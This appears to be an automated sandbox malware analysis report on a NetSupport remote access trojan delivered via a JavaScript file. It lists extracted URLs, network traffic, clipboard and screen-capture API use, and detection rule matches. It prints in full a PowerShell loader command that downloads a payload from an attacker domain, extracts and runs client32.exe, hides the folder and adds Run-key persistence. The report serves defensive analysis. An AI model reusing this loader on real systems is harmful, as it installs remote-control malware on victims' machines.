                                Source: client32.exe, 0000000A.00000003.1532975213.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspwe
                                Source: client32.exe, 0000000A.00000003.1532975213.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspws
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C01667000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ggoryo.com
                                Source: powershell.exe, 00000008.00000002.1738259741.0000026C1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr | String found in binary or memory: http://ocsp.thawte.com0
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr | String found in binary or memory: http://s2.symcb.com0
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr | String found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crt
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr | String found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr | String found in binary or memory: http://sv.symcd.com0&
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.dr | String found in binary or memory: http://www.netsupportsoftware.com
                                Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | String found in binary or memory: http://www.pci.co.uk/support
                                Source: client32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr | String found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr | String found in binary or memory: http://www.symauth.com/cps0(
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr | String found in binary or memory: http://www.symauth.com/rpa00
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr | String found in binary or memory: https://d.symcb.com/cps0%
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.dr | String found in binary or memory: https://d.symcb.com/rpa0
                                Source: wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ggorxo.com/
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C0139F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00229000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ggoryo.com
                                Source: wscript.exe, 00000000.00000003.1346975876.000001FC57274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1346975876.000001FC5729F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ggoryo.com/
                                Source: wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ggoryo.com/0X
                                Source: wscript.exe, 00000000.00000003.1346975876.000001FC57274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com/s
                                Source: wscript.exe, 00000000.00000003.1487288378.000001FC55788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com/trade/da
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com/trade/da.php?9800
                                Source: wscript.exe, 00000000.00000003.1369359764.000001FC5575A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1389692516.000001FC555C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244089717.000001FC54A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com/trade/fix.php?6867
                                Source: wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ggoryo.com/trade/fix.php?6867EF
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: wscript.exe, 00000000.00000003.1366341815.000001FC53AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1243375949.000001FC518D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.jsString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C00F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                Source: powershell.exe, 00000008.00000002.1738259741.0000026C1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                                Source: wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1388374479.000001FC55692000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1255625344.000001FC51AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.jsString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
                                Source: wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355050587.000001FC57D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.jsString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
                                Source: wscript.exe, 00000000.00000003.1253318916.000001FC539D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.htmlX
                                Source: wscript.exe, 00000000.00000003.1416060813.000001FC5443D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.htmlXVNT
                                Source: wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1255625344.000001FC51AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.jsString found in binary or memory: https://www.googleapis.com
                                Source: wscript.exe, 00000000.00000003.1388374479.000001FC55692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.comp
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                                Source: unknownHTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 77.83.199.112:443 -> 192.168.2.16:49707 version: TLS 1.2
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,10_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exeCode function: 10_2_110335A0 GetClipboardFormatNameA,SetClipboardData,10_2_110335A0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
Source: Yara match | File source: 10.2.client32.exe.111b8c68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: client32.exe PID: 4108, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA

System Summary

Source: amsi64_7024.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: sslproxydump.pcap, type: PCAP | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: wscript.exe PID: 7024, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6704, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll
Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Process Stats: CPU usage > 24%
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11113190: GetKeyState,DeviceIoControl,keybd_event
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFECBFA14EE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFECBFA2500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFECBFA2212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFECBFAAAD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFECBFA172F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFECC4B704A
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11073680
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11029BB0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_110627B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_110336D0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11051800
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1115F840
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1102BD40
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1101BCD0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11087F50
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11045E70
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_1101C110
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_111640E0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe | Code function: 10_2_11168345
